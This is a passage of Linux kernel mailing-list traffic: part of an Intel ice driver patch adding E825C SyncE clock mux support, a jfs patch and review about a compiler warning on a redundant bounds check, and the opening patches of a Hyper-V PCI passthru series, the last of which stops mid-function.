dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin 
*pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if 
(pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as recovered clock 
source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. 
+ * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + 
return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
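As an aside, the link-speed-to-divider mapping introduced in ice_tspll_get_div_e825c() above is easy to exercise standalone. The sketch below is not driver code: the enum is a stand-in for the ICE_AQ_LINK_SPEED_* defines, but the divider values mirror the patch.

```c
#include <errno.h>

/* Stand-in speed codes; the driver uses the ICE_AQ_LINK_SPEED_* defines. */
enum speed {
	SPD_100G, SPD_50G, SPD_40G, SPD_25G, SPD_10G,
	SPD_5G, SPD_2500M, SPD_1000M, SPD_100M, SPD_UNKNOWN
};

/* Mirrors the switch in ice_tspll_get_div_e825c(): pick the CGU divider
 * for a given link speed, or -EOPNOTSUPP for unsupported speeds. */
static int get_div(enum speed s, unsigned int *divider)
{
	switch (s) {
	case SPD_100G:
	case SPD_50G:
	case SPD_25G:
		*divider = 10;
		break;
	case SPD_40G:
	case SPD_10G:
		*divider = 4;
		break;
	case SPD_5G:
	case SPD_2500M:
	case SPD_1000M:
		*divider = 2;
		break;
	case SPD_100M:
		*divider = 1;
		break;
	default:
		return -EOPNOTSUPP;
	}
	return 0;
}
```

Note that what actually gets programmed into the ETHDIV_M1/CLKODIV_M1 register fields is divider - 1, per the "programmable divider value (from 2 to 16) minus 1" comment in ice_tspll_cfg_synce_ethdiv_e825c().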
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH] jfs: avoid -Wtautological-constant-out-of-range-compare warning
From: Arnd Bergmann <arnd@arndb.de> A recent change for the range check started triggering a clang warning: fs/jfs/jfs_dtree.c:2906:31: error: result of comparison of constant 128 with expression of type 's8' (aka 'signed char') is always false [-Werror,-Wtautological-constant-out-of-range-compare] 2906 | if (stbl[i] < 0 || stbl[i] >= DTPAGEMAXSLOT) { | ~~~~~~~ ^ ~~~~~~~~~~~~~ fs/jfs/jfs_dtree.c:3111:30: error: result of comparison of constant 128 with expression of type 's8' (aka 'signed char') is always false [-Werror,-Wtautological-constant-out-of-range-compare] 3111 | if (stbl[0] < 0 || stbl[0] >= DTPAGEMAXSLOT) { | ~~~~~~~ ^ ~~~~~~~~~~~~~ Both the old and the new check were useless, but the previous version apparently did not lead to the warning. Rephrase this again by adding a cast. The check is still always false, but the compiler shuts up about it. Fixes: cafc6679824a ("jfs: replace hardcoded magic number with DTPAGEMAXSLOT constant") Signed-off-by: Arnd Bergmann <arnd@arndb.de> --- fs/jfs/jfs_dtree.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c index 0ab83bb7bbdf..e3301e5fa037 100644 --- a/fs/jfs/jfs_dtree.c +++ b/fs/jfs/jfs_dtree.c @@ -2903,7 +2903,7 @@ int jfs_readdir(struct file *file, struct dir_context *ctx) stbl = DT_GETSTBL(p); for (i = index; i < p->header.nextindex; i++) { - if (stbl[i] < 0 || stbl[i] >= DTPAGEMAXSLOT) { + if (stbl[i] < 0 || (unsigned char)stbl[i] >= DTPAGEMAXSLOT) { jfs_err("JFS: Invalid stbl[%d] = %d for inode %ld, block = %lld", i, stbl[i], (long)ip->i_ino, (long long)bn); free_page(dirent_buf); @@ -3108,7 +3108,7 @@ static int dtReadFirst(struct inode *ip, struct btstack * btstack) /* get the leftmost entry */ stbl = DT_GETSTBL(p); - if (stbl[0] < 0 || stbl[0] >= DTPAGEMAXSLOT) { + if (stbl[0] < 0 || (unsigned char)stbl[0] >= DTPAGEMAXSLOT) { DT_PUTPAGE(mp); jfs_error(ip->i_sb, "stbl[0] out of bound\n"); return -EIO; -- 2.39.5
On 2/2/26 3:49AM, Arnd Bergmann wrote: I think it would be better to just drop the useless part of these tests. Shaggy
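For readers following along, the "always false" observation is easy to verify outside the kernel: on Linux targets a signed char spans -128..127, so once stbl[i] < 0 has filtered out negatives, neither spelling of the upper-bound test against 128 (DTPAGEMAXSLOT) can ever fire. A standalone sketch, assuming 8-bit chars; the function names are mine, not jfs code:

```c
#include <limits.h>
#include <stdbool.h>

/* The warned form: the signed char is promoted to int, but can be at
 * most 127, so the comparison against 128 is always false. */
static bool slot_out_of_range_warned(signed char v)
{
	return v < 0 || v >= 128;
}

/* The cast form from the patch: values surviving "v < 0" are 0..127,
 * so the unsigned compare is equally dead; it only silences clang.
 * Both functions reduce to a plain sign test, which is why dropping
 * the second half entirely was suggested in review. */
static bool slot_out_of_range_cast(signed char v)
{
	return v < 0 || (unsigned char)v >= 128;
}
```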
{ "author": "Dave Kleikamp <dave.kleikamp@oracle.com>", "date": "Mon, 2 Feb 2026 11:34:34 -0600", "thread_id": "fd1854c2-d3f1-4901-8b7d-c6ce944caf61@oracle.com.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of the VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in the VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor version 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support in the near future.
Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> This file actually implements irq remapping, so rename to more appropriate hyperv-irq.c. A new file named hyperv-iommu.c will be introduced later. Also, move CONFIG_IRQ_REMAP out of the file and add to Makefile. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- MAINTAINERS | 2 +- drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/{hyperv-iommu.c => hyperv-irq.c} | 4 ---- 4 files changed, 3 insertions(+), 6 deletions(-) rename drivers/iommu/{hyperv-iommu.c => hyperv-irq.c} (99%) diff --git a/MAINTAINERS b/MAINTAINERS index 5b11839cba9d..381a0e086382 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -11741,7 +11741,7 @@ F: drivers/hid/hid-hyperv.c F: drivers/hv/ F: drivers/infiniband/hw/mana/ F: drivers/input/serio/hyperv-keyboard.c -F: drivers/iommu/hyperv-iommu.c +F: drivers/iommu/hyperv-irq.c F: drivers/net/ethernet/microsoft/ F: drivers/net/hyperv/ F: drivers/pci/controller/pci-hyperv-intf.c diff --git a/drivers/iommu/Kconfig b/drivers/iommu/Kconfig index 99095645134f..b4cc2b42b338 100644 --- a/drivers/iommu/Kconfig +++ b/drivers/iommu/Kconfig @@ -355,6 +355,7 @@ config HYPERV_IOMMU bool "Hyper-V IRQ Handling" depends on HYPERV && X86 select IOMMU_API + select IRQ_REMAP default HYPERV help Stub IOMMU driver to handle IRQs to support Hyper-V Linux diff --git a/drivers/iommu/Makefile b/drivers/iommu/Makefile index 8e8843316c4b..598c39558e7d 100644 --- a/drivers/iommu/Makefile +++ b/drivers/iommu/Makefile @@ -30,7 +30,7 @@ obj-$(CONFIG_TEGRA_IOMMU_SMMU) += tegra-smmu.o obj-$(CONFIG_EXYNOS_IOMMU) += exynos-iommu.o obj-$(CONFIG_FSL_PAMU) += fsl_pamu.o fsl_pamu_domain.o obj-$(CONFIG_S390_IOMMU) += s390-iommu.o -obj-$(CONFIG_HYPERV_IOMMU) += hyperv-iommu.o +obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o obj-$(CONFIG_VIRTIO_IOMMU) += virtio-iommu.o obj-$(CONFIG_IOMMU_SVA) += iommu-sva.o obj-$(CONFIG_IOMMU_IOPF) += io-pgfault.o diff --git a/drivers/iommu/hyperv-iommu.c b/drivers/iommu/hyperv-irq.c 
similarity index 99% rename from drivers/iommu/hyperv-iommu.c rename to drivers/iommu/hyperv-irq.c index 0961ac805944..1944440a5004 100644 --- a/drivers/iommu/hyperv-iommu.c +++ b/drivers/iommu/hyperv-irq.c @@ -24,8 +24,6 @@ #include "irq_remapping.h" -#ifdef CONFIG_IRQ_REMAP - /* * According 82093AA IO-APIC spec , IO APIC has a 24-entry Interrupt * Redirection Table. Hyper-V exposes one single IO-APIC and so define @@ -330,5 +328,3 @@ static const struct irq_domain_ops hyperv_root_ir_domain_ops = { .alloc = hyperv_root_irq_remapping_alloc, .free = hyperv_root_irq_remapping_free, }; - -#endif -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:16 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Many PCI passthru related hypercalls require partition id of the target guest. Guests are actually managed by MSHV driver and the partition id is only maintained there. Add a field in the partition struct in MSHV driver to save the tgid of the VMM process creating the partition, and add a function there to retrieve partition id if valid VMM tgid. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root.h | 1 + drivers/hv/mshv_root_main.c | 35 +++++++++++++++++++++++++++------- include/asm-generic/mshyperv.h | 1 + 3 files changed, 30 insertions(+), 7 deletions(-) diff --git a/drivers/hv/mshv_root.h b/drivers/hv/mshv_root.h index 3c1d88b36741..c3753b009fd8 100644 --- a/drivers/hv/mshv_root.h +++ b/drivers/hv/mshv_root.h @@ -134,6 +134,7 @@ struct mshv_partition { struct mshv_girq_routing_table __rcu *pt_girq_tbl; u64 isolation_type; + pid_t pt_vmm_tgid; bool import_completed; bool pt_initialized; }; diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 1134a82c7881..83c7bad269a0 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1823,6 +1823,20 @@ mshv_partition_release(struct inode *inode, struct file *filp) return 0; } +/* Given a process tgid, return partition id if it is a VMM process */ +u64 mshv_pid_to_partid(pid_t tgid) +{ + struct mshv_partition *pt; + int i; + + hash_for_each_rcu(mshv_root.pt_htable, i, pt, pt_hnode) + if (pt->pt_vmm_tgid == tgid) + return pt->pt_id; + + return HV_PARTITION_ID_INVALID; +} +EXPORT_SYMBOL_GPL(mshv_pid_to_partid); + static int add_partition(struct mshv_partition *partition) { @@ -1987,13 +2001,20 @@ mshv_ioctl_create_partition(void __user *user_arg, struct device *module_dev) goto delete_partition; ret = mshv_init_async_handler(partition); - if (!ret) { - ret = FD_ADD(O_CLOEXEC, anon_inode_getfile("mshv_partition", - &mshv_partition_fops, - partition, O_RDWR)); - if (ret >= 0) - return ret; - } + if 
(ret) + goto rem_partition; + + ret = FD_ADD(O_CLOEXEC, anon_inode_getfile("mshv_partition", + &mshv_partition_fops, + partition, O_RDWR)); + if (ret < 0) + goto rem_partition; + + partition->pt_vmm_tgid = current->tgid; + + return ret; + +rem_partition: remove_partition(partition); delete_partition: hv_call_delete_partition(partition->pt_id); diff --git a/include/asm-generic/mshyperv.h b/include/asm-generic/mshyperv.h index ecedab554c80..e46a38916e76 100644 --- a/include/asm-generic/mshyperv.h +++ b/include/asm-generic/mshyperv.h @@ -211,6 +211,7 @@ void __init ms_hyperv_late_init(void); int hv_common_cpu_init(unsigned int cpu); int hv_common_cpu_die(unsigned int cpu); void hv_identify_partition_type(void); +u64 mshv_pid_to_partid(pid_t tgid); /** * hv_cpu_number_to_vp_number() - Map CPU to VP. -- 2.51.2.vfs.0.1
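The tgid-to-partition lookup this patch adds can be modeled in userspace in a few lines. This is only a sketch: the kernel walks an RCU hash table of partitions rather than an array, and PARTID_INVALID below is a stand-in for HV_PARTITION_ID_INVALID.

```c
#include <stdint.h>

#define PARTID_INVALID UINT64_MAX	/* stand-in for HV_PARTITION_ID_INVALID */

struct part {
	int tgid;	/* tgid of the VMM process that created the partition */
	uint64_t id;	/* hypervisor partition id */
};

/* Model of mshv_pid_to_partid(): scan registered partitions for one
 * created by the given VMM tgid, return a sentinel if none matches. */
static uint64_t pid_to_partid(const struct part *tbl, int n, int tgid)
{
	for (int i = 0; i < n; i++)
		if (tbl[i].tgid == tgid)
			return tbl[i].id;
	return PARTID_INVALID;
}
```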
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:19 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Passthru exposes insufficient memory hypercall failure in the current map device interrupt hypercall. In case of such a failure, we must deposit more memory and redo the hypercall. Add support for that. Deposit memory needs partition id, make that a parameter to the map interrupt function. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 38 +++++++++++++++++++++++++++++++------ 1 file changed, 32 insertions(+), 6 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index f6b61483b3b8..ccbe5848a28f 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -13,8 +13,9 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> -static int hv_map_interrupt(union hv_device_id hv_devid, bool level, - int cpu, int vector, struct hv_interrupt_entry *ret_entry) +static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, + bool level, int cpu, int vector, + struct hv_interrupt_entry *ret_entry) { struct hv_input_map_device_interrupt *input; struct hv_output_map_device_interrupt *output; @@ -30,8 +31,10 @@ static int hv_map_interrupt(union hv_device_id hv_devid, bool level, intr_desc = &input->interrupt_descriptor; memset(input, 0, sizeof(*input)); - input->partition_id = hv_current_partition_id; + + input->partition_id = ptid; input->device_id = hv_devid.as_uint64; + intr_desc->interrupt_type = HV_X64_INTERRUPT_TYPE_FIXED; intr_desc->vector_count = 1; intr_desc->target.vector = vector; @@ -64,6 +67,28 @@ static int hv_map_interrupt(union hv_device_id hv_devid, bool level, local_irq_restore(flags); + return status; +} + +static int hv_map_interrupt(u64 ptid, union hv_device_id device_id, bool level, + int cpu, int vector, + struct hv_interrupt_entry *ret_entry) +{ + u64 status; + int rc, deposit_pgs = 16; /* don't loop forever */ + + while (deposit_pgs--) { + status = hv_map_interrupt_hcall(ptid, device_id, 
